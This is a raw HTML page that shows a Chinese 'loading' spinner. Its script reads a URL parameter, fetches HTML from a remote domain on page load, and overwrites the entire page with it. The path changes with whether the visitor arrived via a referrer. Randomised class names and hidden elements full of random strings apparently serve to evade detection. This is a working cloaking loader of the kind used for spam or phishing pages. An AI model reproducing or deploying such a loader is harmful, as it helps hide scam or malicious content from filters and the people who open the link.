<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .UAs4LB {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .UAs4LB .MxPRJE7t3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .UAs4LB .content {
            line-height: 50px;
            text-align: center
        }

        .UAs4LB .img {
            width: 100%
        }

        .UAs4LB .m7U17lItKz {
            text-align: center
        }

        .UAs4LB .m7U17lItKz span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .UAs4LB .m7U17lItKz span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .UAs4LB .m7U17lItKz span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .UAs4LB .m7U17lItKz span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .UAs4LB .m7U17lItKz span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .UAs4LB .m7U17lItKz span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .UAs4LB .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function QwNwfJQtwn(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var FtNjN = QwNwfJQtwn('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ FtNjN +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ FtNjN +".html?a=share";
		}
		
        Fnv17BW=url+"#"+new Date().getTime();
        Fnv17BW && function() {
            $.get(Fnv17BW, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >PeG9VU16bohFRvj3rR4V4sKSrsc0QykmSCn9EzQXMRn</li>
<img  src='' style='display:none'>
<b style='display:none' >ormnqCBfCRqwsCT00uQDFATF9rgBvs2y4Eg5eahA12rE1RRF4wtJIivUdRUfF6M9Awt</b>
<b style='display:none' >ormnqCBfCRqwsCT00uQDFATF9rgBvs2y4Eg5eahA12rE1RRF4wtJIivUdRUfF6M9Awt</b><div class="UAs4LB">
    <div class="MxPRJE7t3">
        <div class="m7U17lItKz">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<p  style='display:none'>xHfM73ssPIoQ</p>
<ul style='display:none' >B9aYOGl3SmL3kfty9libdR36BX47KNTHu91Y5MEfqY</ul>
<div style='display:none'>EQcbTwaPkDHmHzdW68GJnLCGGvm3edngz3yFZ6l</div></body>
</html>